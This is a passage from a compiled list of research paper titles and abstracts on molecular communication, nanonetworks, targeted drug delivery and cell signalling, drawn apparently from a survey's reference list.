analyzed. It is shown that the capacity can be increased by appropriately selecting the donor-acceptor pair, the medium, the intermolecular distance, and the orientation of the molecules. --- paper_title: A nanoscale communication channel with fluorescence resonance energy transfer (FRET) paper_content: In this study, a novel and physically realizable nanoscale communication paradigm is introduced based on a well-known phenomenon, Fluorescence Resonance Energy Transfer (FRET) for the first time in the literature. FRET is a nonradiative energy transfer process between fluorescent molecules based on the dipole-dipole interactions of molecules. Energy is transferred rapidly from a donor to an acceptor molecule in a close proximity such as 0 to 10 nm without radiation of a photon. Low dependency on the environmental factors, controllability of its parameters and relatively wide transfer range make FRET a promising candidate to be used for a high rate nanoscale communication channel. In this paper, the simplest form of the FRET-based molecular communication channel for a single transmitter and a single receiver nanomachine is modeled. Furthermore, using the information theoretical approach, the capacity of the point-to-point communication channel is investigated and the dependency of the capacity on some environmental and intrinsic parameters is analyzed. It is shown that the capacity can be increased by appropriately selecting the donor-acceptor pair, the medium, the intermolecular distance and the orientation of the molecules. --- paper_title: Diffusive Molecular Communication with Disruptive Flows paper_content: In this paper, we study the performance of detectors in a diffusive molecular communication environment where steady uniform flow is present. We derive the expected number of information molecules to be observed in a passive spherical receiver, and determine the impact of flow on the assumption that the concentration of molecules throughout the receiver is uniform. Simulation results show the impact of advection on detector performance as a function of the flow's magnitude and direction. We highlight that there are disruptive flows, i.e., flows that are not in the direction of information transmission, that lead to an improvement in detector performance as long as the disruptive flow does not dominate diffusion and sufficient samples are taken. --- paper_title: A Molecular Communication System Model for Particulate Drug Delivery Systems paper_content: The goal of a drug delivery system (DDS) is to convey a drug where the medication is needed, while, at the same time, preventing the drug from affecting other healthy parts of the body. Drugs composed of micro- or nano-sized particles (particulate DDS) that are able to cross barriers which prevent large particles from escaping the bloodstream are used in the most advanced solutions. Molecular communication (MC) is used as an abstraction of the propagation of drug particles in the body. MC is a new paradigm in communication research where the exchange of information is achieved through the propagation of molecules. Here, the transmitter is the drug injection, the receiver is the drug delivery, and the channel is realized by the transport of drug particles, thus enabling the analysis and design of a particulate DDS using communication tools. This is achieved by modeling the MC channel as two separate contributions, namely, the cardiovascular network model and the drug propagation network. The cardiovascular network model allows to analytically compute the blood velocity profile in every location of the cardiovascular system given the flow input by the heart. The drug propagation network model allows the analytical expression of the drug delivery rate at the targeted site given the drug injection rate. Numerical results are also presented to assess the flexibility and accuracy of the developed model. The study of novel optimization techniques for a more effective and less invasive drug delivery will be aided by this model, while paving the way for novel communication techniques for Intrabody communication networks. --- paper_title: Transmission Rate Control for Molecular Communication among Biological Nanomachines paper_content: In this paper, we discuss issues concerned with transmission rate control in molecular communication, an emerging communication paradigm for bio-nanomachines in an aqueous environment. In molecular communication, a group of bio-nanomachines acting as senders transmit molecules, the molecules propagate in the environment, and another group of bio-nanomachines acting as receivers chemically react to the molecules propagating in the environment. In the model of molecular communication considered in this paper, senders may transmit molecules at a high rate to accelerate the receiver reactions or to increase the throughput. However, if the senders transmit molecules faster than the receivers react, the excess molecules remain in the environment and eventually degrade or diffuse away, which results in loss of molecules or degradation in efficiency. Such a potential issue associated with throughput and efficiency is in this paper discussed as an optimization problem. A mathematical expression for an upper-bound on the throughput and efficiency is first derived to provide an insight into the impact of model parameters. The optimal transmission rates that maximize the throughput and efficiency are then numerically calculated and presented, and throughput and efficiency are shown to be in trade-off relationships in a wide range of transmission rates. Further, two classes of feedback-based transmission rate control schemes are designed for autonomous bio-nanomachines to dynamically control their transmission rates, respectively based on negative and positive feedback from the receivers. The numerical evaluation of the two transmission rate control schemes is then shown to provide useful guidelines for application developers to satisfy their design goals. --- paper_title: Simulation of Molecular Signaling in Blood Vessels: Software Design and Application to Atherogenesis paper_content: Abstract This paper presents a software platform, named BiNS2, able to simulate diffusion-based molecular communications with drift inside blood vessels. The contribution of the paper is twofold. First a detailed description of the simulator is given, under the software engineering point of view, by highlighting the innovations and optimizations introduced. Their introduction into the previous version of the BiNS simulator was needed to provide the functions for simulating molecular signaling and communication potentials inside bounded spaces. The second contribution consists of the analysis, carried out by using BiNS2, of a specific communication process happening inside blood vessels, the atherogenesis, which is the initial phase of the formation of atherosclerotic plaques, due to the abnormal signaling between platelets and endothelium. From a communication point of view, platelets act as mobile transmitters, endothelial cells are fixed receivers, sticky to the vessel walls, and the transmitted signal is made of bursts of molecules emitted by platelets. The simulator allows for the evaluation of the channel latency and the footprint on the vessel wall of the transmitted signal as a function of the transmitter distance from the vessels wall, the signal strength, and the receiver sensitivity. --- paper_title: TCP-like molecular communications paper_content: In this paper, we present a communication protocol between a pair of biological nanomachines, i.e., a transmitter and a receiver, built upon molecular communications in an aqueous environment. In our proposal, the receiver, acting as a control node, sends a connection setup signal to the transmitter, which stokes molecules, to start molecule transmission. The molecules transmitted by the transmitter propagate in the environment and are absorbed by the receiver through its receptors. When the receiver absorbs the desired quantity of molecules, it releases a tear-down signal to notify the transmitter to stop the transmission. The proposed protocol implements a bidirectional communication by using a number of techniques originally designed for the TCP. In fact, the proposed protocol is connection-oriented and uses the TCP-like probing to find a suitable transmission rate between the transmitter and the receiver to avoid receiver congestion. Unlike the TCP, however, explicit acknowledgments are not used since they would degrade the communication throughput due to the large delay, which is a characteristic feature of molecular communications. Thus, the proposed protocol uses implicit acknowledgments, and feedback signals are sent by the receiver to throttle the transmission rate at the transmitter, i.e., explicit negative feedback. We also present the results of an extensive simulation campaign, used to validate the proposed protocol and to properly dimension the main protocol parameters. --- paper_title: Influence of Red Blood Cells on Nanoparticle Targeted Delivery in Microcirculation paper_content: Multifunctional nanomedicine holds considerable promise as the next generation of medicine that allows for targeted therapy with minimal toxicity. Most current studies on nanoparticle (NP) drug delivery consider a Newtonian fluid with suspending NPs. However, blood is a complex biological fluid composed of deformable cells, proteins, platelets, and plasma. For blood flow in capillaries, arterioles and venules, the particulate nature of the blood needs to be considered in the delivery process. The existence of the cell-free-layer and NP–cell interaction will largely influence both the dispersion and binding rates, thus impact targeted delivery efficacy. In this paper, a particle–cell hybrid model is developed to model NP transport, dispersion, and binding dynamics in blood suspension. The motion and deformation of red blood cells (RBCs) is captured through the Immersed Finite Element Method. The motion and adhesion of individual NPs are tracked through Brownian adhesion dynamics. A mapping algorithm and an interaction potential function are introduced to consider the cell–particle collision. NP dispersion and binding rates are derived from the developed model under various rheology conditions. The influence of red blood cells, vascular flow rate, and particle size on NP distribution and delivery efficacy is characterized. A non-uniform NP distribution profile with higher particle concentration near the vessel wall is observed. Such distribution leads to over 50% higher particle binding rate compared to the case without RBC considered. The tumbling motion of RBCs in the core region of the capillary is found to enhance NP dispersion, with dispersion rate increasing as shear rate increases. Results from this study contribute to the fundamental understanding and knowledge on how the particulate nature of blood influences NP delivery, which will provide mechanistic insights on the nanomedicine design for targeted drug delivery applications. --- paper_title: Advection, diffusion and delivery over a network paper_content: Many biological, geophysical, and technological systems involve the transport of a resource over a network. In this paper, we present an efficient method for calculating the exact quantity of the resource in each part of an arbitrary network, where the resource is lost or delivered out of the network at a given rate, while being subject to advection and diffusion. The key conceptual step is to partition the resource into material that does or does not reach a node over a given time step. As an example application, we consider resource allocation within fungal networks, and analyze the spatial distribution of the resource that emerges as such networks grow over time. Fungal growth involves the expansion of fluid filled vessels, and such growth necessarily involves the movement of fluid. We develop a model of delivery in growing fungal networks, and find good empirical agreement between our model and experimental data gathered using radio-labeled tracers. Our results lead us to suggest that in foraging fungi, growth-induced mass flow is sufficient to account for long-distance transport, if the system is well insulated. We conclude that active transport mechanisms may only be required at the very end of the transport pathway, near the growing tips. --- paper_title: Reliability and Delay Analysis of Multihop Virus-Based Nanonetworks paper_content: Molecular communication is a new communication paradigm that allows nanomachines to communicate using biological mechanisms and/or components to transfer information (e.g., molecular diffusion, molecular motors). One possible approach for molecular communication is through the use of virus particles that act as carriers for nucleic acid-based information. This paper analyzes multihop molecular nanonetworks that utilize virus particles as information carrier. The analysis examines the physiochemical and biological characteristics of virus particles such as diffusion, absorption, and decay, and how they affect the reliability of multihop communication in molecular nanonetworks. The paper also analyzes the use of a simple implicit acknowledgement protocol for a single-path topology, and compare its performance to defined and random multipath topologies that do not use acknowledgments. Numerical results show that commensurate reliability is achievable for single-path with implicit acknowledgement and multipath topologies. However, the single-path topology exhibits increased communication delay and more uncertain end-to-end communication time. --- paper_title: Stable Escherichia coli-Clostridium acetobutylicum shuttle vector for secretion of murine tumor necrosis factor alpha paper_content: Recombinant plasmids were constructed to secrete mouse tumor necrosis factor alpha (mTNF-α) from Clostridium acetobutylicum. The shuttle plasmids contained the clostridial endo-β1,4-glucanase (eglA) promoter and signal sequence that was fused in frame to the mTNF-α cDNA. The construction was first tested in Escherichia coli and then introduced in C. acetobutylicum DSM792 by electroporation. Controls confirmed the presence and stability of the recombinant plasmids in this organism. Sodium dodecyl sulfate-polyacrylamide gel electrophoresis and an in vitro cytotoxic assay were used to monitor expression and secretion of mTNF-α during growth. Significant levels of biologically active mTNF-α were measured in both lysates and supernatants. The present report deals with investigations on the elaboration of a gene transfer system for cancer treatment using anaerobic bacteria. --- paper_title: Bacterial targeted tumour therapy-dawn of a new era. paper_content: Original observation of patients' spontaneous recovery from advanced tumours after an infection or a "fever" inspired extensive research. As a result, Coley's toxin for the therapy of sarcomas and live Bacillus Calmette-Guerin (BCG) for bladder cancer were born. In addition, three genera of anaerobic bacteria have been shown to specifically and preferentially target solid tumours and cause significant tumour lyses. Initial research had focused on determining the best tumour colonizing bacteria, and assessing the therapeutic efficacy of different strategies either as a single or combination treatment modalities. However, although clinical trials were carried out as early as the 1960s, lack of complete tumour lyses with injection of Clostridial spores had limited their further use. Recent progress in the field has highlighted the rapid development of new tools for genetic manipulation of Clostridia which have otherwise been a hurdle for a long time, such as plasmid transformation using electroporation that bore the problems of inefficiency, instability and plasmid loss. A new Clostridium strain, C. novyi-NT made apathogenic by genetic modification, is under clinical trials. New genetic engineering tools, such as the group II intron has shown promise for genetic manipulation of bacteria and forecast the dawn of a new era for a tumour-targeted bacterial vector system for gene therapy of solid tumours. In this review we will discuss the potential of genetically manipulated bacteria that will usher in the new era of bacterial therapy for solid tumours, and highlight strategies and tools used to improve the bacterial oncolytic capability. --- paper_title: Forward and Reverse Coding for Chromosome Transfer in Bacterial Nanonetworks paper_content: Abstract Bacteria has been proposed in recent years as one approach to achieve molecular communication. Bacterial cells can harbour DNA encoded information and can deliver this information from one nanomachine to another by swimming (motility). One aspect of bacterial communication that could further enhance the performance of information delivery in bacterial nanonetworks is conjugation . Conjugation involves forming a physical connection between the bacteria in order to transfer DNA molecules (i.e., plasmids or chromosomes). However, the fragile physical connection between the bacteria is prone to breakage, in particular under mechanical stress. In this paper, a simple Forward and Reverse coding process is proposed to enhance the performance of information delivery in bacterial nanonetworks. The coding process involves segmenting messages into blocks and integrating this into the bacterial chromosome. Simulation work have been conducted to validate the efficiency of the coding process, where the results have shown positive performance compared to approaches that do not utilize coding or pure conjugation. --- paper_title: Oxygen status of malignant tumors: pathogenesis of hypoxia and significance for tumor therapy. paper_content: Hypoxic areas are a characteristic property of solid tumors. Hypoxia results from an imbalance between the supply and consumption of oxygen. Major pathogenetic mechanisms for the emergence of hypoxia are (1) structural and functional abnormalities in the tumor microvasculature; (2) an increase in diffusion distances; and (3) tumor- or therapy-associated anemia leading to a reduced O2 transport capacity of the blood. There is pronounced intertumor variability in the extent of hypoxia, which is independent of clinical size, stage, histopathologic type, and grade. Local recurrences have a higher hypoxic fraction than primary tumors. Tumor hypoxia is intensified in anemic patients, especially in tumors with low perfusion rates. Tumor hypoxia is a therapeutic problem, as it makes solid tumors resistant to sparsely ionizing radiation and some forms of chemotherapy. Hypoxia also may modulate the proliferation and cell cycle position of tumor cells and, in turn, the amount of cells destroyed following therapy. Recent clinical studies suggest that hypoxia can enhance malignant progression and increase aggressiveness through clonal selection and genome changes. As a result, loss of differentiation and apoptosis, chaotic angiogenesis, increased locoregional spread, and enhanced metastasis can further increase resistance to therapy and affect long-term prognosis. Hypoxia is a powerful, independent prognostic factor in cervix cancers, carcinomas of the head and neck, and in soft-tissue sarcomas. --- paper_title: Secretory production of biologically active rat interleukin-2 by Clostridium acetobutylicum DSM792 as a tool for anti-tumor treatment. paper_content: The search for effective means of selectively delivering high therapeutic doses of anti-cancer agents to tumors has explored a variety of systems in the last decade. The ability of intravenously injected clostridial spores to infiltrate and thence selectively germinate in the hypoxic regions of solid tumors is exquisitely specific, making this system an interesting addition to the anti-cancer therapy arsenal. To increase the number of therapeutic proteins potentially useful for cancer treatment we have tested the possibility of Clostridium acetobutylicum to secrete rat interleukin-2 (rIL2). Therefore, rIL2 cDNA was placed under the control of the endo-beta-1,4-glucanase promoter and signal sequence of C. saccharobutylicum. Recombinant C. acetobutylicum containing the relevant construct secreted up to 800 microgl(-1) biologically active rIL2. The obtained yield should be sufficient to provoke in vivo effects. --- paper_title: Universal computing by DNA origami robots in a living animal paper_content: Nanoscale robots made from DNA origami can dynamically interact with each other and perform logic computations in a living animal. --- paper_title: Amplifying Genetic Logic Gates paper_content: Organisms must process information encoded via developmental and environmental signals to survive and reproduce. Researchers have also engineered synthetic genetic logic to realize simpler, independent control of biological processes. We developed a three-terminal device architecture, termed the transcriptor, that uses bacteriophage serine integrases to control the flow of RNA polymerase along DNA. Integrase-mediated inversion or deletion of DNA encoding transcription terminators or a promoter modulates transcription rates. We realized permanent amplifying AND, NAND, OR, XOR, NOR, and XNOR gates actuated across common control signal ranges and sequential logic supporting autonomous cell-cell communication of DNA encoding distinct logic-gate states. The single-layer digital logic architecture developed here enables engineering of amplifying logic gates to control transcription rates within and across diverse organisms. --- paper_title: A Molecular Communication System Model for Particulate Drug Delivery Systems paper_content: The goal of a drug delivery system (DDS) is to convey a drug where the medication is needed, while, at the same time, preventing the drug from affecting other healthy parts of the body. Drugs composed of micro- or nano-sized particles (particulate DDS) that are able to cross barriers which prevent large particles from escaping the bloodstream are used in the most advanced solutions. Molecular communication (MC) is used as an abstraction of the propagation of drug particles in the body. MC is a new paradigm in communication research where the exchange of information is achieved through the propagation of molecules. Here, the transmitter is the drug injection, the receiver is the drug delivery, and the channel is realized by the transport of drug particles, thus enabling the analysis and design of a particulate DDS using communication tools. This is achieved by modeling the MC channel as two separate contributions, namely, the cardiovascular network model and the drug propagation network. The cardiovascular network model allows to analytically compute the blood velocity profile in every location of the cardiovascular system given the flow input by the heart. The drug propagation network model allows the analytical expression of the drug delivery rate at the targeted site given the drug injection rate. Numerical results are also presented to assess the flexibility and accuracy of the developed model. The study of novel optimization techniques for a more effective and less invasive drug delivery will be aided by this model, while paving the way for novel communication techniques for Intrabody communication networks. --- paper_title: Antibody-Based Immunotherapy of Cancer paper_content: By targeting surface antigens expressed on tumor cells, monoclonal antibodies have demonstrated efficacy as cancer therapeutics. Recent successful antibody-based strategies have focused on enhancing antitumor immune responses by targeting immune cells, irrespective of tumor antigens. We discuss these innovative strategies and propose how they will impact the future of antibody-based cancer therapy. --- paper_title: Aptamers and Their Applications in Nanomedicine paper_content: Aptamers are composed of short RNA or single-stranded DNA sequences that, when folded into their unique 3D conformation, can bind to their targets with high specificity and affinity. Although functionally similar to protein antibodies, oligonucleotide aptamers offer several advantages over protein antibodies in biomedical and clinical applications. Through the enhanced permeability and retention effect, nanomedicines can improve the therapeutic index of a treatment and reduce side effects by enhancing accumulation at the disease site. However, this targets tumors passively and, thus, may not be ideal for targeted therapy. To construct ligand-directed "active targeting" nanobased delivery systems, aptamer-equipped nanomedicines have been tested for in vitro diagnosis, in vivo imaging, targeted cancer therapy, theranostic approaches, sub-cellular molecule detection, food safety, and environmental monitoring. This review focuses on the development of aptamer-conjugated nanomedicines and their application for in vivo imaging, targeted therapy, and theranostics. --- paper_title: Antibody therapy of cancer paper_content: The use of monoclonal antibodies (mAbs) for cancer therapy has achieved considerable success in recent years. Antibody-drug conjugates are powerful new treatment options for lymphomas and solid tumours, and immunomodulatory antibodies have also recently achieved remarkable clinical success. The development of therapeutic antibodies requires a deep understanding of cancer serology, protein-engineering techniques, mechanisms of action and resistance, and the interplay between the immune system and cancer cells. This Review outlines the fundamental strategies that are required to develop antibody therapies for cancer patients through iterative approaches to target and antibody selection, extending from preclinical studies to human trials. --- paper_title: Antibody-based molecular communication for targeted drug delivery systems paper_content: Antibody-based drug delivery systems (ADDS) are established as the most promising therapeutic methods for the treatment of human cancers and other diseases. ADDS are composed of small molecules (antibodies) that selectively bind to receptors (antigens) expressed by the diseased cells. In this paper, the Molecular Communication (MC) paradigm, where the delivery of molecules is abstracted as the delivery of information, is extended to be applied to the design and engineering of ADDS. The authors have previously developed a straightforward framework for the modeling of Particulate Drug Delivery Systems (PDDS) using nano-sized molecules. Here, the specificities of antibody molecules are taken into account to provide an analytical model of ADDS transport. The inputs of the MC model of PDDS are the geometric properties of the antibodies and the topology of the blood vessels where they are propagated. Numerical results show that the analytical MC model is in good agreement with finite-element simulations, and that the anisotropy is an important factor influencing ADDS. --- paper_title: Semiconductor Quantum Dots for Photodynamic Therapy paper_content: The applicability of semiconductor QDs in photodynamic therapy (PDT) was evaluated by studying the interaction between CdSe QDs with a known silicon phthalocyanine PDT photosensitizer, Pc4. The study revealed that the QDs could be used to sensitize the PDT agent through a fluorescence resonance energy transfer (FRET) mechanism, or interact directly with molecular oxygen via a triplet energy-transfer process (TET). Both mechanisms result in the generation of reactive singlet oxygen species that can be used for PDT cancer therapy. --- paper_title: In vivo molecular and cellular imaging with quantum dots. paper_content: Quantum dots (QDs), tiny light-emitting particles on the nanometer scale, are emerging as a new class of fluorescent probe for in vivo biomolecular and cellular imaging. In comparison with organic dyes and fluorescent proteins, QDs have unique optical and electronic properties: size-tunable light emission, improved signal brightness, resistance against photobleaching, and simultaneous excitation of multiple fluorescence colors. Recent advances have led to the development of multifunctional nanoparticle probes that are very bright and stable under complex in vivo conditions. A new structural design involves encapsulating luminescent QDs with amphiphilic block copolymers and linking the polymer coating to tumor-targeting ligands and drug delivery functionalities. Polymer-encapsulated QDs are essentially nontoxic to cells and animals, but their long-term in vivo toxicity and degradation need more careful study. Bioconjugated QDs have raised new possibilities for ultrasensitive and multiplexed imaging of molecular targets in living cells, animal models and possibly in humans. --- paper_title: A soluble receptor for interleukin-1β encoded by vaccinia virus: A novel mechanism of virus modulation of the host response to infection paper_content: Vaccinia virus gene B15R is shown to encode an abundant, secretory glycoprotein that functions as a soluble interleukin-1 (IL-1) receptor. This IL-1 receptor has novel specificity since, in contrast with cellular counterparts, it binds only IL-1 beta and not IL-1 alpha or the natural competitor IL-1 receptor antagonist. The vaccinia IL-1 beta receptor is secreted when expressed in a baculovirus system and competitively inhibited binding of IL-1 beta to the natural receptor on T cells. Deletion of B15R from vaccinia virus accelerated the appearance of symptoms of illness and mortality in intranasally infected mice, suggesting that the blockade of IL-1 beta by vaccinia virus can diminish the systemic acute phase response to infection and modulate the severity of the disease. The IL-1 beta binding activity is present in other orthopoxviruses. --- paper_title: Regulatory pathways in inflammation. paper_content: Tuning is a key aspect of inflammatory reaction essential in homeostasis and pathology. An emerging mechanism for negative regulation of proinflammatory cytokines is based on non-signaling IL-1/TLR receptors and chemokine receptors competing with signaling receptors for ligand binding and sustaining ligand internalization and degradation. Biological activities of IL-1R/TLR receptors are under control of membrane-bound binding molecules lacking the signaling domain, soluble receptor antagonists, and intracellular signaling inhibitors. The chemokine system includes at least three 'silent' receptors with distinct specificity and tissue distribution. D6 is the best characterized representative member of this class of negative regulators, binds most inflammatory, but not homeostatic, CC chemokines and shuttles in a ligand-independent way from the plasma membrane to endocytic compartments where chemokines are targeted to degradation. In vitro and in vivo evidence, including results with gene targeted mice, is consistent with the view that these non-signaling receptors for proinflammatory cytokines possess unique functional and structural features which make them ideally adapted to act as a decoy and scavenger receptors, with a non redundant role in dampening tissue inflammation and tuning draining lymph nodes reactivity. --- paper_title: Genetic control of mammalian T-cell proliferation with synthetic RNA regulatory systems paper_content: RNA molecules perform diverse regulatory functions in natural biological systems, and numerous synthetic RNA-based control devices that integrate sensing and gene-regulatory functions have been demonstrated, predominantly in bacteria and yeast. Despite potential advantages of RNA-based genetic control strategies in clinical applications, there has been limited success in extending engineered RNA devices to mammalian gene-expression control and no example of their application to functional response regulation in mammalian systems. Here we describe a synthetic RNA-based regulatory system and its application in advancing cellular therapies by linking rationally designed, drug-responsive, ribozyme-based regulatory devices to growth cytokine targets to control mouse and primary human T-cell proliferation. We further demonstrate the ability of our synthetic controllers to effectively modulate T-cell growth rate in response to drug input in vivo. Our RNA-based regulatory system exhibits unique properties critical for translation to therapeutic applications, including adaptability to diverse ligand inputs and regulatory targets, tunable regulatory stringency, and rapid response to input availability. By providing tight gene-expression control with customizable ligand inputs, RNA-based regulatory systems can greatly improve cellular therapies and advance broad applications in health and medicine. --- paper_title: Decoy receptors: a strategy to regulate inflammatory cytokines and chemokines. paper_content: The canonical concept of a receptor includes specific ligand recognition, usually with high affinity and specificity, and signaling. Decoy receptors recognize certain inflammatory cytokines with high affinity and specificity, but are structurally incapable of signaling or presenting the agonist to signaling receptor complexes. They act as a molecular trap for the agonist and for signaling receptor components. The interleukin-1 type II receptor (IL-1RII) was the first pure decoy to be identified. Decoy receptors have subsequently been identified for members of the tumor necrosis factor receptor and IL-1R families. Moreover, silent nonsignaling receptors could act as decoys for chemokines. Therefore, the use of decoy receptors is a general strategy to regulate the action of primary pro-inflammatory cytokines and chemokines. --- paper_title: Inhibition of vascular endothelial cell growth factor activity by an endogenously encoded soluble receptor paper_content: Abstract ::: Vascular endothelial cell growth factor, a mitogen selective for vascular endothelial cells in vitro that promotes angiogenesis in vivo, functions through distinct membrane-spanning tyrosine kinase receptors. The cDNA encoding a soluble truncated form of one such receptor, fms-like tyrosine kinase receptor, has been cloned from a human vascular endothelial cell library. The mRNA coding region distinctive to this cDNA has been confirmed to be present in vascular endothelial cells. Soluble fms-like tyrosine kinase receptor mRNA, generated by alternative splicing of the same pre-mRNA used to produce the full-length membrane-spanning receptor, encodes the six N-terminal immunoglobulin-like extracellular ligand-binding domains but does not encode the last such domain, transmembrane-spanning region, and intracellular tyrosine kinase domains. The recombinant soluble human receptor binds vascular endothelial cell growth factor with high affinity and inhibits its mitogenic activity for vascular endothelial cells; thus this soluble receptor could act as an efficient specific antagonist of vascular endothelial cell growth factor in vivo. --- paper_title: A simulation tool for nanoscale biological networks paper_content: a b s t r a c t Nanonetworking is a new interdisciplinary research area including nanotechnology, biotechnology, and ICT. In this paper, we present a novel simulation platform designed for modeling information exchange at nanoscales. This platform is adaptable to any kind of nano bearer, i.e. any mechanism used to transport information, such as electromagnetic waves or calcium ions. Moreover, it includes a set of configuration functions in order to adapt to different types of biological environments. In this paper, we provide a throughout description of the simulation libraries. In addition, we demonstrate their capabilities by modeling a section of a lymph node and the information transfer within it, which happens between antibody molecules produced by the immune system during the humoral immune response. --- paper_title: Using Information Metrics and Molecular Communication to Detect Cellular Tissue Deformation paper_content: Calcium-signaling-based molecular communication has been proposed as one form of communication for short range transmission between nanomachines. This form of communication is naturally found within cellular tissues, where Ca(2+) ions propagate and diffuse between cells. However, the naturally flexible structure of cells usually leads to the cells dynamically changing shape under strain. Since the interconnected cells form the tissue, a change in shape of one cell will change the shape of the neighboring cells and the tissue as a whole. This will in turn dramatically impair the communication channel between the nanomachines. We propose a process for nanomachines utilizing Ca(2+) based molecular communication to infer and detect the state of the tissue, which we term the Molecular Nanonetwork Inference Process. The process employs a threshold based classifier that identifies its threshold boundaries based on a training process. The inference/detection mechanism allows the destination nanomachine to determine: i) the type of tissue deformation; ii) the amount of tissue deformation; iii) the amount of Ca(2+) concentration emitted from the source nanomachine; and iv) its distance from the destination nanomachines. We evaluate the use of three information metrics: mutual information, mutual information with generalized entropy and information distance. Our analysis, which is conducted on two different topologies, finds that mutual information with generalized entropy provides the most accurate inferencing/detection process, enabling the classifier to obtain 80% of accuracy on average. --- paper_title: Molecular signaling in bioengineered tissue microenvironments. paper_content: Biological tissues and organs consist of specialized living cells arrayed within a complex structural and functional framework known generally as the extracellular matrix (ECM). The great diversity observed in the morphology and composition of the ECM contributes enormously to the properties and function of each organ and tissue. For example, the ECM contributes to the rigidity and tensile strength of bone, the resilience of cartilage, the flexibility and hydrostatic strength of blood vessels, and the elasticity of skin. The ECM is also important during growth, development, and wound repair: its own dynamic composition acts as a reservoir for soluble signaling molecules and mediates signals from other sources to migrating, proliferating, and differentiating cells. Artificial three-dimensional substitutes for ECM, called tissue scaffolds, may consist of natural or synthetic polymers or a combination of both. Scaffolds have been used successfully alone and in combination with cells and soluble factors to induce tissue formation or promote tissue repair. Appropriate numbers of properly functioning living cells are central to many tissue-engineering strategies, and significant efforts have been made to identify and propagate pluripotent stem cells and lineage-restricted progenitor cells. The study of these and other living cells in artificial microenvironments, in turn, has led to the identification of signaling events important for their controlled proliferation, proper differentiation, and optimal function. --- paper_title: Calcium Wave Propagation in Networks of Endothelial Cells: Model-based Theoretical and Experimental Study paper_content: In this paper, we present a combined theoretical and experimental study of the propagation of calcium signals in multicellular structures composed of human endothelial cells. We consider multicellular structures composed of a single chain of cells as well as a chain of cells with a side branch, namely a ‘‘T’’ structure. In the experiments, we investigate the result of applying mechano-stimulation to induce signaling in the form of calcium waves along the chain and the effect of single and dual stimulation of the multicellular structure. The experimental results provide evidence of an effect of architecture on the propagation of calcium waves. Simulations based on a model of calcium-induced calcium release and cell-to-cell diffusion through gap junctions shows that the propagation of calcium waves is dependent upon the competition between intracellular calcium regulation and architecture-dependent intercellular diffusion. --- paper_title: Mechanical stimulation initiates cell-to-cell calcium signaling in ovine lens epithelial cells. paper_content: Although abnormalities in calcium regulation have been implicated in the development of most forms of cataract, the mechanisms by which Ca2+ is regulated in the cells of the ocular lens remain poorly defined. Cell-to-cell Ca2+ signaling was investigated in primary cultures of ovine epithelial cells using the Ca(2+)-reporter dye fura-2 and fluorescence microscopy. Mechanical stimulation of a single cell with a micropipette initiated a propagated increase in cytosolic free Ca2+ that spread from the stimulated cell through 2-8 tiers of surrounding cells. During this intercellular Ca2+ wave, cytosolic Ca2+ increased 2- to 12-fold from resting levels of approximately 100 nM. Nanomolar extracellular Ca2+ did not affect the cell-to-cell propagation of the Ca2+ wave, but reduced the magnitude of the cytosolic Ca2+ increases, which was most evident in the mechanically-stimulated cell. Depletion of intracellular Ca2+ stores with thapsigargin eliminated the propagated intercellular Ca2+ wave, but did not prevent the cytosolic Ca2+ increase in the mechanically-stimulated cell, which required extracellular Ca2+ and was attenuated by the addition of the Ca2+ channel blockers Ni2+, Gd3+ and La3+ to the medium. These results are most easily explained by a mechanically-activated channel in the plasma membrane of the stimulated cell. The propagated increase in cytosolic Ca2+ appeared to be communicated to adjacent cells by the passage of an intracellular messenger other than Ca2+ through gap junction channels. However, if the plasma membrane of the mechanically-stimulated cell was ruptured such that there was loss of cytosolic contents, the increase in cytosolic Ca2+ in the surrounding cells was elicited by both a messenger passing through gap junction channels and by a cytosolic factor(s) diffusing through the extracellular medium. These results demonstrate the existence of intercellular Ca2+ signaling in lens cells, which may play a role in regulating cytosolic Ca2+ in the intact lens. --- paper_title: Molecular communication for nanomachines using intercellular calcium signaling paper_content: Molecular communication is engineered biological communication (e.g., cell-to-cell signaling) that allows nanomachines (e.g., engineered organisms, artificial devices) to communicate through chemical signals in an aqueous environment. This paper describes the design of a molecular communication system based on intercellular calcium signaling networks. This paper also describes possible functionalities (e.g., signal switching and aggregation) that may be achieved in such networks. --- paper_title: DIRECT: A model for molecular communication nanonetworks based on discrete entities paper_content: A number of techniques have been recently proposed to implement molecular communication, a novel method which aims to implement communication networks at the nanoscale, known as nanonetworks. A common characteristic of these techniques is that their main resource consists of molecules, which are inherently discrete. This paper presents DIRECT, a novel networking model which differs from conventional models by the way of treating resources as discrete entities; therefore, it is particularly aimed to the analysis of molecular communication techniques. Resources can be involved in different tasks in a network, such as message encoding, they do not attenuate in physical terms and they are considered 100% reusable. The essential properties of DIRECT are explored and the key parameters are investigated throughout this paper. --- paper_title: Therapeutic stem and progenitor cell transplantation for organ vascularization and regeneration paper_content: Emerging evidence suggests that bone marrow‐derived endothelial, hematopoietic stem and progenitor cells contribute to tissue vascularization during both embryonic and postnatal physiological processes. Recent preclinical and pioneering clinical studies have shown that introduction of bone marrow‐derived endothelial and hematopoietic progenitors can restore tissue vascularization after ischemic events in limbs, retina and myocardium. Corecruitment of angiocompetent hematopoietic cells delivering specific angiogenic factors facilitates incorporation of endothelial progenitor cells (EPCs) into newly sprouting blood vessels. Identification of cellular mediators and tissue-specific chemokines, which facilitate selective recruitment of bone marrow‐derived stem and progenitor cells to specific organs, will open up new avenues of research to accelerate organ vascularization and regeneration. In addition, identification of factors that promote differentiation of the progenitor cells will permit functional incorporation into neo-vessels of specific tissues while diminishing potential toxicity to other organs. In this review, we discuss the clinical potential of vascular progenitor and stem cells to restore long-lasting organ vascularization and function. --- paper_title: Protein-based signaling systems in tissue engineering. paper_content: Tissue engineering aims to replace damaged tissues or organs using either transplanted cells or host cells recruited to the target site. Protein signaling is crucial to regulate cell phenotype and thus engineered tissue structure and function. Biomaterial vehicles are being designed to incorporate and locally deliver various molecules involved in this signaling, including both growth factors and peptides that mimick whole proteins. Controlling the concentration, local duration and spatial distribution of these factors is key to their utility and efficacy. Recent advances have been made in the development of polymeric delivery systems intended to achieve this control. --- paper_title: A synthetic multicellular system for programmed pattern formation paper_content: Pattern formation is a hallmark of coordinated cell behaviour in both single and multicellular organisms. It typically involves cell–cell communication and intracellular signal processing. Here we show a synthetic multicellular system in which genetically engineered ‘receiver’ cells are programmed to form ring-like patterns of differentiation based on chemical gradients of an acyl-homoserine lactone (AHL) signal that is synthesized by ‘sender’ cells. In receiver cells, ‘band-detect’ gene networks respond to user-defined ranges of AHL concentrations. By fusing different fluorescent proteins as outputs of network variants, an initially undifferentiated ‘lawn’ of receivers is engineered to form a 